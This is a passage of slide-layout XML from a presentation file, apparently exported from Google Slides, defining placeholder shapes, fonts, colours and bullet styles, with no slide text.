          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="7150">
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;32;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="1841063"/>
            <a:ext cx="3242700" cy="1864800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;33;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="1403213"/>
            <a:ext cx="3002400" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;34;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;35;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter SemiBold"/>
                <a:ea typeface="Inter SemiBold"/>
                <a:cs typeface="Inter SemiBold"/>
                <a:sym typeface="Inter SemiBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;36;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4180088" y="1993425"/>
            <a:ext cx="3850800" cy="1316400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-323850" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-323850" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-323850" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-323850" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-323850" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-323850" lvl="5" marL="2743200">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-323850" lvl="6" marL="3200400">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-323850" lvl="7" marL="3657600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-323850" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Castoro"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Castoro"/>
                <a:ea typeface="Castoro"/>
                <a:cs typeface="Castoro"/>
                <a:sym typeface="Castoro"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Google Shape;37;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
